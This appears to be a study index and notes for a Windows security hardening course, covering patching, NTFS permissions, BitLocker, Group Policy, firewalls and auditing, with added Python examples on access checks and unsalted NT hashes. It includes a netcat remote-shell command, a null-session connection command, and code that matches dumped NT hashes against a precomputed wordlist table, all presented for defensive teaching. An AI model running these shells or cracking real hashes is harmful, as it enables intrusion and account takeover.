hotfix newsfeed                                    5     58
Microsoft Update                                   5     59
Automatic Updates                                  5     60
update ISO file                                    5     60
WSUS (Windows Server Update Services)              5     61
Software Update Services SUS                       5     61
Windows Update Services WUS                        5     61
how WSUS works                                     5     63
BITS (Background Intelligent Transfer Service)     5     63
WSUS administration                                5     64
wuau.adm template                                  5     64
patch management, 3rd party                        5     66
HFNETCHK.EXE tool
backup Win XP/2003                                 5     69
ntbackup.exe                                       5   69,71
ASR (Automated System Recovery)                    5     69
VERITAS (of Backup Exec fame)                      5     69
system state                                       5     71
Windows 7/2008/Vista backup                        5     72
ntbackuprestore.exe                                5     72
backup Win7, 2008, Vista                           5     72
backup Vista Home Basic/Premium                    5     72
robocopy.exe                                       5     73
robocopy.exe command                               5     73
wbadmin.exe                                        5     73
WSB (Windows Server Backup)                        5     73
Volume Shadow Copy Service                         5     73
backup, 3rd party                                  5     74
binary disk image                                  5     75
dd for Windows                                     5     75
Symantec Ghost                                     5     75
system restore snapshot                            5     76
restore point                                      5     76
system restore, automatic                          5     76
system restore Win XP                              5     77
system restore Win 7/Vista                         5     77
Previous Versions tab in Vista/later               5     77
restore point from calendar                        5     78
previous versions, how? steps                      5     79
Backup & Restore Center integration                5     80
driver rollback                                    5     81
SAT (Selective Access Control)                     5     86
CDFS                                               5     88
FAT and FAT32                                      5     88
NPFS (Named Pipes File System)                     5     88
NTFS (NT File System)                              5     88
NTFS characteristics                               5     88
NTFS - unsed exception                             5     88
transaction-oriented processing                    5     89
NTFS compression                                   5     89
BSOD blue screen of death                          5     89
CHKDSK.exe                                         5     89
NTFS DACL                                          5     90
DACL: list of permissions on a file or folder      5     90
ACE (Access Control Entries)                       5     90
XCACLS.exe                                         5     90
ICACLS.exe                                         5     90
NTFS - ACE                                         5     90
NTFS special permissions box                       5     90
standard or generic permissions - NTFS             5     90
Advanced Security Settings: deny overrides allow                deny ACEs are evaluated before allow ACEs of the same kind (explicit or inherited), so a matching deny wins; an explicit allow still beats an inherited deny
NTFS standard permissions                          5     91
NTFS inherited permissions                         5     91
NTFS explicit permissions                          5     91
NTFS permission inheritance                        5   90,91
NTFS scope of inheritance                          5     92
NTFS: complexity is a security vulnerability       5     92
permission schema                                  5     92
CREATOR OWNER group                                5     93
NTFS least privilege                               5     95
principle of least privilege                       5     95
Power Users group                                  5     96
global group                                       5     97
universal group                                    5     97
AGULP                                              5     97      Accounts -> Global groups -> Universal groups -> domain Local groups -> Permissions
Active Directory groups                            5     99
a distribution group in AD                         5    100
universal group (security)                         5    100
SMB (Server Message Block)                         5    101
CIFS (Common Internet File System)                 5    101
shared folder access                               5    101
share permissions                                  5    101
share permissions                                  5    102
net.exe share                                      5    102
share permissions XP                               5    103
share permissions 2003/later                       5    103
share permissions                                  5    103
administrative shares                              5    105
administrative shares - removing                   5    105
administrative shares - IPC                        5    105
IPC$                                               5    105
UNC (Universal Naming Convention)                  5    104
registry                                           5    108
REG.exe                                            5    108
REGEDIT.exe                                        5    108
registry keys                                      5    108
registry values                                    5    108
REGSVC.exe                                         5    109
Remote Registry service                            5    109
registry key permissions                           5    109
Registry "winreg"                                  5    109
Registry "AllowedPaths"                            5    110
SACL (System Access Control List)                  5    111
registry permissions                               5    111
Active Directory permissions                       5    112
organizational unit                                5    114
Active Directory delegation of authority           5    114
delegation of authority - AD                       5    114
MIC (Mandatory Integrity Control)                  5    116
WIC (Windows Integrity Control)                    5    116
SAT (Security Access Token)                        5    116
ICACLS.exe                                         5    117
whoami.exe                                         5    117
accesschk.exe                                      5    117
chml.exe                                           5    117
MIC (Mandatory Integrity Control) - label          5    117
MIC (Mandatory Integrity Control) - rule           5    117      no-write-up: a lower-integrity process cannot write to or delete a higher-labelled object
MIC (Mandatory Integrity Control) - read           5    117
MIC does not restrict read/execute                 5    117
MIC is evaluated prior to the DACL                 5    117
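The rows on NTFS permissions (deny overrides allow, explicit vs. inherited, p. 90-92) and on MIC (p. 116-117) describe one access check. The block below is an added example, not course material, that models that check in miniature: integrity label first (no-write-up, read/execute exempt), then the DACL walked in canonical ACE order. The access-mask bits, the SID strings and the sample folder are simplified constructions; the integrity level values are the real ones.

```python
"""Windows access check in miniature: the integrity label (MIC) is checked
before the DACL, and within the DACL the canonical order (explicit deny,
explicit allow, inherited deny, inherited allow) is what makes "deny
overrides allow" true.  Added example, not course material; the access
mask bits and the sample folder are simplified constructions."""
from dataclasses import dataclass

# Simplified access mask (real NTFS masks have many more bits).
READ, WRITE, EXECUTE, DELETE = 0x1, 0x2, 0x4, 0x8
FULL = READ | WRITE | EXECUTE | DELETE

# Integrity levels carry the real label values from the SID S-1-16-<level>.
LOW, MEDIUM, HIGH, SYSTEM = 0x1000, 0x2000, 0x3000, 0x4000


@dataclass
class Ace:
    kind: str            # "allow" or "deny"
    sid: str             # user or group the entry applies to
    mask: int
    inherited: bool = False


@dataclass
class SecurityDescriptor:
    dacl: list           # None models a NULL DACL (everyone gets everything)
    integrity: int = MEDIUM   # objects without an explicit label are Medium


@dataclass
class Token:
    sids: set
    integrity: int = MEDIUM


def canonical(dacl):
    """ACE order Windows stores and the Advanced Security Settings GUI enforces."""
    return sorted(dacl, key=lambda a: (a.inherited, a.kind != "deny"))


def access_check(token: Token, sd: SecurityDescriptor, requested: int):
    """Return (granted?, reason) for a token asking for `requested` bits."""
    # 1. Mandatory integrity: NO_WRITE_UP.  Only write-type access is
    #    policed; read and execute pass regardless of label.
    if requested & (WRITE | DELETE) and token.integrity < sd.integrity:
        return False, "MIC: no-write-up (label blocks write before the DACL is read)"
    if sd.dacl is None:
        return True, "NULL DACL grants everything"
    # 2. DACL walk: a deny on any still-needed bit ends the check; allows
    #    accumulate until every requested bit is covered.
    remaining = requested
    for ace in canonical(sd.dacl):
        if ace.sid not in token.sids:
            continue
        if ace.kind == "deny" and ace.mask & remaining:
            origin = "inherited" if ace.inherited else "explicit"
            return False, f"denied by {origin} deny for {ace.sid}"
        if ace.kind == "allow":
            remaining &= ~ace.mask
            if remaining == 0:
                return True, "all requested bits granted"
    return False, "not granted by any ACE (empty DACL or missing allow)"


# Constructed sample folder: Users get Full Control through inheritance,
# but an explicit deny removes WRITE for the Interns group.
PROJECT_FOLDER = SecurityDescriptor(dacl=[
    Ace("allow", "BUILTIN\\Users", FULL, inherited=True),
    Ace("deny", "DOMAIN\\Interns", WRITE),
])
INTERN = Token(sids={"BUILTIN\\Users", "DOMAIN\\Interns"})
# A Low-integrity process (IE Protected Mode) run by a normal user.
IE_PROTECTED_MODE = Token(sids={"BUILTIN\\Users"}, integrity=LOW)

if __name__ == "__main__":
    for who, tok, want in (("intern read", INTERN, READ),
                           ("intern write", INTERN, READ | WRITE),
                           ("IE low write", IE_PROTECTED_MODE, WRITE),
                           ("IE low read", IE_PROTECTED_MODE, READ)):
        print(who, access_check(tok, PROJECT_FOLDER, want))
```

The `canonical` sort is the whole point of "complexity is a security vulnerability" (p. 92): tools that write ACEs out of canonical order (some older scripts and APIs can) change the outcome without changing a single entry.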
whoami /priv                                       5    118
user rights                                        5    118
user rights - managed by GPO                       5    118
ntrights.exe                                       5    119
user rights allow/deny user or group               5    122
take ownership right                               5    123
backup/restore files and directories right         5    124
user rights backup/restore                         5    124
DLL injection attack                               5    125
debug programs right - used in DLL injection & Cain 5   125
Cain dumps password hashes and LSA secrets         5    125
cipher.exe                                         5    126
OllyDbg                                            5    125
EFS (Encrypting File System)                       5    126
WebDAV, SMB                                        5    126
EFS (Encrypting File System) versions              5    128
EFS recovery certificate                           5    129
cipher.exe /R:<filepath>                           5    129
cipher.exe /R:<filepath> /smartcard                5    129
Encrypting File System Win2000                     5    130
Encrypting File System best practices              5    131
syskey.exe                                         5    131
paging files                                       5    131
EFS best practice - SYSKEY.EXE tool                5    131
syskey.exe                                         5    132
cipher.exe /w                                      5    132      overwrites free space so deleted plaintext copies of EFS files cannot be recovered
PAGEFILE.SYS                                       5    132
HIBERFIL.SYS                                       5    132
BitLocker benefits                                 5    133
BitLocker availability                             5    133
BitLocker - encryption                             5    133
BitLocker boot volume                              5    133
BitLocker prerequisites                            5    133
BitLocker - requirements                           5    134
BitLocker system volume                            5    134
BitLocker - integrity check details                5    134
FVEK (Full Volume Encryption Key)                  5    134
BitLocker steps, how it works                      5    134
TPM turn on                                        5    134
TPM (Trusted Platform Module)                      5    135
Trusted Platform Module initialization             5    135
TPM.msc                                            5    135
TPM management                                     5    135
BitLocker TPM options                              5    136
BitLocker transparent 100% to users                5    136
WMI                                                5    137
cold boot attack                                   5    137      keys remain in RAM for a short time after power-off; an attacker with physical access can reboot into a minimal OS and recover them, so TPM-only mode is weaker than TPM + PIN
BitLocker turn off                                 5    138
BitLocker disabling                                5    138
BitLocker recovery                                 5    139
TPM owner password                                 5    139
emergency recovery - BitLocker                     5    140
BitLocker recovery password                        5    140
BitLocker recovery/backup to Active Directory      5    140
security template                                  5    145
security template store                            5    145
.INF security template                             5    145
security template files                            5    146
%systemroot%\security\Templates\                   5    146
edit security template                             5    146
MMC.exe                                            5    146
Generic.inf new security templates                 5    146
Microsoft, NIST, DISA, NSA                         5    146      publishers of hardening baselines/templates
security template enterprise client                5    147
Specialized Security Limited Functionality         5    147
SSLF                                               5    147
FDCC                                               5    148
CIS (Center for Internet Security)                 5    148
FISMA                                              5    148
CIS scoring tool                                   5    148
SCA snap-in                                        5    150
Security Configuration and Analysis                5    150
SCA database                                       5    150
secedit.exe                                        5    152
secedit.exe /configure /db a:\db.sdb               5    152      applies the settings stored in the security database to the local machine
local GPO (Group Policy Object)                    5    153
computer configuration / GPO                       5    153
user configuration / GPO                           5    153
local group policy object (GPO)                    5    155
WSH (Windows Script Host)                          5    156
GPO scripts (startup/shutdown scripts)             5    156
administrative templates                           5    157
Microsoft Office kit                               5    157
ADM/ADMX templates                                 5    157
domain group policy object                         5    158
organizational unit GPO                            5    159
default domain policy GPO                          5    159
GPMC Group Policy Management Console               5    160
default domain policy GPO                          5    160
GPO settings checklist                             5    161
GPO password policy                                5    162
minimum password policy                            5    163
account lockout policy                             5    164
GPO security options recommended                   5    165
GPO administrative templates                       5    166
anonymous access                                   5    169
null user session                                  5    169
dumpusers.exe                                      5  169,170
null session command                               5    169
net.exe use \\target\IPC$ "" /user:""              5    169      connects to the IPC$ share with an empty username and password (null session)
null session disabling                             5    170
Anonymous restrictions                             5    170
Anonymous permissions / ANONYMOUS LOGON group      5    170
anonymous connections - additional restrictions    5    170
anonymous access disabling                         5    170
anonymous access                                   5    170
Kerberos & NTLMv2                                  5    172
Kerberos tickets                                   5    171
RainbowCrack                                       5    171      precomputed tables work against NT/LM hashes because they are unsalted
LAN Manager Authentication Level GPO               5    172
NTLMv2 enabling                                    5    172
NTLMv1 / LAN Manager disabling                     5    172
NTLMv2                                             5    172
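Why the rows above (RainbowCrack, p. 171, and the LAN Manager authentication level, p. 172) belong together: the NT hash is MD4 of the UTF-16LE password with no salt, so one precomputed table resolves every user on every machine. The block below is an added example, not course material. It carries its own MD4 (RFC 1320) because recent OpenSSL builds disable md4 in hashlib, computes NT hashes, and resolves a "dumped" set of hashes against a precomputed table. The wordlist, user names and dumped hashes are constructed inside the block; the test vectors are the RFC 1320 ones plus the well-known NT hash of "password".

```python
"""NT hash = MD4(UTF-16LE(password)), unsalted.  Pure-Python MD4 (RFC 1320)
so it runs where OpenSSL has md4 disabled.  Added example, not course
material; the "dumped" hashes are computed here from constructed passwords."""
import struct


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 digest (16 bytes)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data)
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    msg += b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)      # pad to 56 mod 64
    msg += struct.pack("<Q", bit_len)                 # little-endian length
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                           # round 1
            a = _rol((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 2
            k = (i % 4) * 4 + i // 4
            a = _rol((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):
            a = _rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c                   # round 3
        A, B, C, D = ((A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF,
                      (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF)
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """The value stored in the SAM/NTDS and used by NTLM: no salt and no
    per-user secret, so identical passwords give identical hashes."""
    return md4(password.encode("utf-16-le")).hex()


def build_lookup_table(wordlist) -> dict:
    """One-time precomputation.  Because NT hashes are unsalted, this table
    (or a rainbow table, its space-efficient cousin) works against every
    user on every machine, which is what makes RainbowCrack practical."""
    return {nt_hash(pw): pw for pw in wordlist}


def lookup(table: dict, hashes: dict) -> dict:
    """Resolve a dump of {user: nt_hash} against the table, O(1) per user."""
    return {user: table.get(h.lower()) for user, h in hashes.items()}


# Constructed: a small wordlist and a "dumped" SAM where two users chose
# the same weak password and one did not.
WORDLIST = ["password", "Password1", "letmein", "Winter2010", "P@ssw0rd"]
DUMPED_HASHES = {
    "alice": nt_hash("Password1"),
    "bob": nt_hash("Password1"),
    "svc_backup": nt_hash("Tr0ub4dor&3"),
}

if __name__ == "__main__":
    print(lookup(build_lookup_table(WORDLIST), DUMPED_HASHES))
```

Note that alice and bob have byte-identical hashes before any cracking is done: the dump alone already tells an attacker which accounts share a password. This is the argument for NTLMv2 over LM/NTLMv1 on the wire (challenge-response with a client nonce) and, on disk, for keeping the hashes out of reach (syskey, BitLocker), since the hash itself cannot be made harder to look up.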
guest account disabling                            5    173
net user guest $5&uuu /active:no /times:                        sets a password, disables the account and, with a blank /times:, leaves no permitted logon hours; quote the password if it contains cmd metacharacters such as &
automatic demotion to guest "file share"           5    174
Simple File Sharing network access                 5    174
Classic - local users authenticate as themselves   5    174
administrative accounts                            5    175
administrative accounts locking                    5    175
runas.exe                                          5    176
decoy account                                      5    176
SRP (Software Restriction Policies)                5    177
SRP exceptions                                     5    177
SRP (Software Restriction Policies)                5  177,178
CRL (Certificate Revocation List)                  5    178
SRP global options                                 5    178
SRP enforcement option                             5    178
SRP designated file types                          5    178
SRP trusted publishers options                     5    178
AppLocker (Application Locker)                     5    178
User Account Control                               5    179
DROPMYRIGHTS.EXE                                   5    179
whoami.exe                                         5    179
Internet Explorer security                         5    181
Internet Explorer Protected Mode                   5    181
Internet Explorer Protected Mode                   5    182      IE runs at Low integrity, so MIC blocks writes outside Low-labelled locations
ieuser.exe                                         5    182
ieinstall.exe                                      5    182
broker process                                     5    182
Internet Explorer                                  5    183
Internet Explorer hardening                        5    184
SmartScreen filter                                 5    187
Trusted Sites zone                                 5    186
Restricted Sites zone                              5    186
XSS filter                                         5    187
InPrivate filtering                                5    187
Phishing filter                                    5    187
"Phishy Pheatures"                                 5    187
thwart XSS attacks                                 5    187
Cross-Site Scripting                               5    187
bad sites                                          5    187
Report Unsafe                                      5    187
secure host                                        5    190
service disabling                                  5    193
SECEDIT.exe or SCA                                 5    193
INF security template                              5    193
Security Configuration and Analysis                5    193
services startup settings                          5    193
sc.exe                                             5    194
sc.exe \\pc query                                  5    194      list services and their state on a remote machine
sc.exe getkeyname "Display Name"                   5    194      translate a display name to the service's registry key name
sc.exe \\pc queryex service_regkey                 5    194      extended status, including the PID
sc.exe \\pc qc service_regkey                      5    194      query configuration (binary path, start type, account)
sc.exe \\pc stop service_regkey                    5    194
sc.exe \\pc config service_regkey start= disabled  5    194      note the space after "=", sc.exe requires it
service dependencies                               5    194
dependencies service                               5    194
SC.EXE better than NET.EXE                         5    194
system services section of GPO                     5    194
SCW (Security Configuration Wizard) "scw.exe"      5    196
roles in SCW                                       5    196
rollback                                           5    196
SCW XML policy file                                5    197
XML report - SCW                                   5    197
scwcmd.exe                                         5    197
scwcmd.exe configure /p:file.xml                   5    197
Security Configuration Wizard functions            5    197
scwcmd.exe view /x:report.xml                      5    198
scwcmd.exe analyze /?                              5    198
scwcmd.exe configure /?                            5    198
scwcmd.exe transform /p:policyfile /g:GPOname      5    198      converts an SCW policy into a GPO
server manager                                     5    199
roles in server manager                            5    199
roles & features add/remove                        5    200
servermanagercmd.exe                               5    200
Server Core installation option                    5    200
binding                                            5    201
network adapter binding                            5    201
nbtstat -A ipaddress                               5    203      lists the remote machine's NetBIOS name table
NetBIOS name                                       5    203
NetBIOS code number                                5    203
code number inside chevrons                        5    203      e.g. <00> workstation service, <20> file server service
NetBIOS                                            5    205
NetBIOS disabling                                  5    205
sc.exe qc netbt                                    5    206
sc.exe config netbt start= disabled                5    206
sc.exe config netbt start= system                  5    206
NetBIOS - null user sessions                       5    206
Lightweight Directory Access Protocol              5    208
LDAP                                               5    208
Kerberos port numbers                              5    208      TCP/UDP 88 (464 for password changes)
NetBIOS name service                               5    209      UDP 137
NetBIOS datagram service                           5    209      UDP 138
NetBIOS session service                            5    209      TCP 139
WFAS                                               5    211
Windows Firewall with Advanced Security            5    211
WFAS                                               5    212
network location types                             5    213
network location types - private                   5    213
network location types - public                    5    213
network profile                                    5    213
domain network in network location types           5    213
network location types - domain                    5    214
WFAS log pfirewall.log                             5    214
WFAS block all connections                         5    214
WFAS rules "firewall rules"                        5    215
secure connection                                  5    216
require encryption                                 5    215
nc.exe -L -p 7890 -e cmd.exe                       5    216      netcat listener handing out cmd.exe: the kind of inbound connection a host firewall should block
firewall "WFAS" keep blocking / unblock            5    217
WFAS rule processing                               5    217      block rules are evaluated before allow rules; if no rule matches, the profile's default action (inbound block) applies
netsh.exe                                          5    218
netsh.exe advfirewall show allprofiles             5    218
netsh.exe advfirewall firewall show rule name=all  5    218
netsh.exe advfirewall firewall set rule            5    218
Ipsec                                      5   220
ipsecpol.exe                               5   221
ipseccmd.exe                               5   221
netsh.exe ipsec dynamic                    5   221


ipsec commands                             5   221
ipsec request                              5   223
ipsec & Group policy                       5   223
ipsec client respond only                  5   224
ipsec require in Organization Unit         5   225
ipsec secure server require security       5   225
ipsec server request security              5   225
SSTP (secure socket tunneling protocol)     5   226
L2tp (layer two tunneling protocol)         5   226
ipsec+l2tp vpn                              5   226
point to point tunneling protocol PPTP      5   226
PPTPv1                                     5   227
pptpv2                                     5   227
vpn client software                        5   228
vpn interface                              5   228
ipconfig.exe                               5      228
vpn require pptpv2                         5      229
MS-CHAPv2 option with PPTPv2               5      229
EAP (Extensible Authentication Protocol)   5      229
Routing and Remote Access service          5      230
NLB (Network load balance)                 5      230

RRAS                                       5      230
internet security & acceleration server    5      230
IIS (Information Internet Server)          5      233
IIS ( Information Internet Server )        5      233
Server Core                                5      234
Stand-alone IIS box                        5      234
IIS is member server /domain member        5      234
IIS Patched Install                        5      234
server 2008 R2                             5      234
.NET Framework                             5      234

IIS server manager                         5      235
SERVERMANAGERCMD.EXE tool                  5      235
servermanagercmd.exe -query                5      235
IIS NTFS permissions                       5      236


IIS NTFS permissions                       5      236
IIS IUSR_computername                      5      237
IIS host header                            5      238

IIS host header                            5      238


Code Red Worm                              5   239,241
IIS handler                                5       240
iis handler native code                 5   240
iis handler managed code                5   240
iis staticFile handler                  5   240
iis directory handler                   5   240
inetinfo.exe                            5   240
internet printing buffer overflow       5   241
htr buffer overflow                     5   241
active server page exploit              5   241
iis folders not to have                 5   242
iis msadc folder                        5   242
old rain forest puppy rds exploit       5   242
iis exchange folder                     5   242
OWA Worm                                5   242
IIS access controls                     5   243
IIS Basic Authentication                5   244
IIS urlscan.dll                         5   245
urlscan.dll                             5   245
IIS7 requestFilteringModule             5   245
IIS logging                             5   246
IIS enable logging                      5   246
IIS security logging                    5   246
wget.exe                                5   247
webdav                                  5   247
logging interval                        5   247
search-textlog.ps1                      5   248
sql server security tips                5   249
integrated windows authentication       5   249
RDS ( Remote Desktop Services )         5   252
RDS (Remote Desktop Services) license   5   253
remote desktop                          5   253
Terminal services                       5   253
remote desktop services web access      5   255
remote assistance                       5   255
RDP(Remote Desktop Protocol )          5   256
tcp port 3389                          5   256
RDP encryption levels server2003       5   256
RDP Encryption levels fips compliant   5   256
NLA (Network Level Authentication)     5   257
RDP 6 client                           5   256
RDP 7 client                           5   258
RDP best practices                     5   259
RDP citrix                             5   260
Microsoft Security Assessment Tool     5   261
MSAT                                   5   261
mbsacli.exe                            5   262
auditing                               5   266
automation                             5   266
support tools                          5   269
support tools list                     5   269
remote server administration tools     5   270
RSAT                                   5   270
microsoft resource kits                5   271
list of resource kits                  5   272
list of resource kits 2                5   275
wmic.exe                               5   277
wmic.exe /node:ip get servicepack      5   281
snapshot.bat script                    5   310
network configuration tools            5   282
netdiag.exe                            5   282
netdiag.exe /v                         5   282
netdiag /test:testName /v              5   282
netsh.exe                              5   282
netsh.exe set machine IpAddress        5   283
getmac.exe                             5   283
net.exe                                5   283
netstat.exe                            5   283
ipconfig.exe                     5   283
route.exe                        5   283
nbtstat.exe                      5   283
sysinternals tools               5   284
foundstone                       5   284
somarsoft                        5   284
joeware                          5   284
process explorer                 5   284
autoRuns                         5   284
psExec                           5   284
rootkitrevealer                  5   284
psinfo                           5   284
forensic toolkit                 5   284
forensic toolkit                 5   284
ntlast                           5   284
fport                            5   284
scanline                         5   284
dumpEvt                          5   284
dumpReg                          5   284
Dumpsec                          5   284
joeware                          5   284
windows server resource kit      5   286
windows management instrument    5   286
wmi                              5   286
windows scripts                  5   286
technet script center            5   289
set in cmd.exe                   5   289
powershell                       5   290
powershell                       5   290
exchange server 2007             5   290
cmdlet                           5   290
power shell commands             5   291
FRS (File Replication Service)   5   292
scripts using GPO                      5   292
wscript.exe \\server\script.vbs        5   295
scheduling jobs                        5   294
SCHTASKS.exe                           5   294
CCB (Change Control Board)             5   297
CCB (Change Control Board)             5   297
audit policy compliance                5   297
SCA snap in                            5   298
secedit.exe                            5   299
Microsoft Baseline Security Analyzer   5   300
MBSA features                          5   300
SQL Security using MBSA                5   303
mbsacli.exe                            5   304
mbsacli.exe /r "ip-range" /f "file"    5   304
mbsacli.exe /l"ell"                    5   305
mbsacli.exe /Id "report name"          5   305
system snapshot                        5   306
system snapshot name                   5   307
system snapshot format                 5   307
snapshot content                       5   308
metabase                               5   309
snapshot.bat script                    5   310
sha256deep.exe                         5   310
net.exe accounts                       5   311
auditpol.exe /get /category:*          5   311
netsh.exe winsock show catalog         5   312
netsh.exe firewall show config         5   312
wmic.exe sysdriver list full           5   313
autorunsc.exe                          5   313
diruse.exe /s                          5   313
fc.exe /                               5   315
windiff.exe                            5   315
csdiff.exe                             5   315
list.exe                               5   315
highlighter                            5   316
windows event logs                     5   317
windows event logs application logs    5   318
logevent.exe                           5   318
system log                             5   318
event log                              5   318
logevent.exe                           5   318
audit policies                         5   319
audit account logon events             5   319
audit account management               5   319
audit directory service access         5   319
audit logon events                     5   319
audit object access                    5   319
audit policy change                    5   319
audit privilege use                    5   320
audit process tracking                 5   320
audit system events                    5   320
auditpol.exe                           5   320
auditpol.exe /get /category:*          5   320
audit object access policy             5   321
SACL (System Access Control List)      5   321
audit access to registry key           5   322
Audit best practices/should be audit   5   324
diruse.exe                             5   325
log size in xp /2003                   5   326
log size in vista/7                    5   326
logs wrapping options                  5   327
wrapping options                       5   327
psloglist.exe                          5   328
dumpevt.exe                            5   328
syslog                                 5   329
log consolidation                      5   328
dumpeventlog.vbs                    5   329
Microsoft System Center Operation   5   329
mom server                          5   329
Notes                                                                                       Column1
windows xp sp2, windows 2003                                                                 module 25
can't join domain, no GPO, no EFS, no dual CPU support, no editable file system ACL
windows firewall, improvement in automatic updates, security center applet, DEP
Data Execution Prevention
prevents execution of code in areas of memory that aren't intended to hold executable data
in xp sp2 anonymous over-the-network RPC is not permitted
not permitted to send user data only udp sockets are allowed
credential roaming support,wifi protected access,network access protection
IE7 not included in xp sp3 ,upgrading IE must be performed separately
standard server, enterprise server, datacenter server
supports two 32-bit CPUs, no more than 2GB of RAM, can act as POP3, available for channel partners
editions to provide scalability, fault-tolerance, clustering, network load balancing
32bit or 64bit,Distributed file system,ADFS,ADAM
enhanced in 2003 R2,allow user to access shared files
active directory federation services,single sign-on across forests and company boundaries
active directory application mode,LDAP-based services,better unix support
ADAM,for application which don't store data in active directory,but use authentication
not an incremental upgrade to win xp, slow performance, backward compatibility issues
can verify integrity of boot-up files, encryption key in USB or TPM
to warn users when malware attempts to exercise their admin rights
included in windows 7 by default
the storage of your EFS decryption key on the same card you logon with
managable through group policy and NETSH.exe
managable through group policy and NETSH.exe
specify what software is allowed to run on users' PCs centrally
win7, win2003R2, allow remote users to access the enterprise without worrying about VPN
standard and enterprise, support 32/64-bit, take care of hyper-v support
component modularization,server core,RODC,NAP,SSTP,
easy addition/removal of these roles and features
server2008, doesn't include start menu, taskbar, control panel or internet explorer
new graphical interface,modularized,Ftp-over-ssl is available
can use bitlocker with tpm chip and likely installed with server core option
check if users have the latest patches,recent virus updates,
SSTP,encapsulate packets in http,then encrypt using ssl
RRAS,support both ipsec and ssl vpns
routing and remote access service
ability to host individual applications on RDP server instead of entire desktops
give user GUI of another remote host,in server2008 enhanced features
.net integrated framework for executing commands and scripts
built in server2008 -64bit only,is virtual machine system
active directory recycle bin,is 64 bit only,branchcache
server2008 R2,enable smb or http caching via peer to peer or centrally hosted
full operating system,rsa secureID
slot in mobiles,multi gigabyte memory at least 8 giga
malware can move from pc to mobile and vice-versa
centralized control over windows mobile
Centralized Conf. Management, Anti-Malware Scanners, Data Enc. & Access Control
for windows mobile: airscanner, BitDefender, F-Secure, Computer Associates
for windows mobile: Checkpoint, Credant, SafeBoot, Trust Digital
patching,backup
windows computers that share information in absence of any domain controller
no domain controllers
simple,each pc protect itself,lower costs,each user is admin on his pc
no centralized management or auditing,no single sign-on,difficult to manage large no users
account applet in control panel, start>administrative tools>computer management, NET.exe
for each user or group, unique,
S-1-1-0 Everyone group, S-1-5-11 Authenticated Users group, S-1-5-32-544 local admin group
your identification & rights, each program has a copy of SAT, whoami.EXE /all /fo list --------->win.7   sat
the names and SIDs of your groups and all your user rights SAT
database of user accounts
server to manage active directory database
each resource has a list contain (SIDs and permission of each SID to this resource)
change in AD database will be replicated to all other domain controller automatically
primary domain controller can modify database
backup domain controller receive changes from other AD
in active directory on every object, if any conflict the later change overrides the earlier


a list of cached credentials is tracked, so if compromised the users are forced to change passwords
accounts, kerberos master keys, certificates, replication links, OU, trust relationships
maximum size is 4TB
never sent over the network,important parts sent in the network by authentication protocol                 sat

Default, AD is the key distribution center for kerberos, your kerberos key is derived from your
password, kerberos applications in windows don't need to be kerberized like unix, kerberos found in IKE, RSVP
but not in (FTP, telnet), kerberos faster than NTLM & clients can cache & reuse their ticket


Kerberos-found in SMB/CIFS,RPC,LDAP,HTTP,dyn DNS,IPSEC ,IKE,RSVP, NOT FOUND in FTP , TELNET
if initial kerberos exchange is captured it can be vulnerable to bruteforce, Kerberos vulnerable to
bruteforce, ticket request encrypted by user password

NTLM v2 is not vulnerable, NTLM predecessor to kerberos & still supported for compatibility, NTLM
used in workgroups & domains, NTLM uses user passphrase hashes to compare in domain, NTLMv1
vulnerable to sniff & crack (cain) because it uses LAN Manager & NT/MD4, NTLMv2 not vulnerable to crack as it doesn't
use LAN Manager, NTLM is supported by win NT & later
one or more AD that replicate portions of database and which all trust each other

special domain controller which replicates across domain boundaries

portion of AD that is replicated across domain boundaries, is the part of DB replicated between domains,
forest schema is all possible types of objects & their attributes in domain, forest configuration naming context
(sites, subnets, intersite replication links), forest schema & configuration are replicated & synced in all the forest,
define all types of objects and their attributes in directory
define all the sites,subnets and inter-site replication links
two domain trust eachother
created manually, transitive, two way or one way trust == Cross forest trust, all server2003, no
replication, transitive 1 or 2 way == Forest: inside one forest all domains trust each other by default ==
Forest: cross forest trust must be created manually == Forest: cross forest trust is transitive so all
domains in 2 forests trust == One-way cross forest trust: one side trusts the other side == No cross forest
replication in cross forest trust == Forest: inter-domain replication in the same forest
the trust passes through chain,
access to resource goes in the opposite direction of trust direction
password policies, account policies, audit policies, ntfs, kerberos

special logon scripts which when run can configure almost anything in the computer == Group policy configures
each security option in win 2000 & later == Group policy is the most important data replicated between
domains == Group policy are special login scripts which when run reconfigure anything == Group policy runs
when computer boots & is checked every 90 to 120 min == group policy runs user GPO at login & PC checks it
every 90 min == group policy in active directory is applied to sites, computers & OUs == Group policy: how
to open & edit it in local PC or active directory

a collection of updates and hotfixes rolled up in one large installation package           service pack:
giant patch has some hotfixes & updates together                                    service pack is between 100 and
300MB                                                                                                       module 26

lab test + deploy in limited groups (staging) == do staged roll-outs & check for problems ==
service pack: test it at lab first because it can break applications or cause net problems (test by VMware)
few boxes at a time, start with the least important, end with the most critical
update the source of windows so when installing it with SP in one shot


xp and later, schedule commands to run at specific time or periodically, execute batch
execute process on remote machine, without going to PC, execute batch, included in resource kit
execute process on remote machine, without going to PC like telnet, execute batch
batch file then run it remotely or from psexec.exe or schtasks.exe or exec.vbs
map network drive
use by built in windows installer service on each machine to handle installation process
small program will update a few OS files with updated versions == hotfixes patch one security hole by
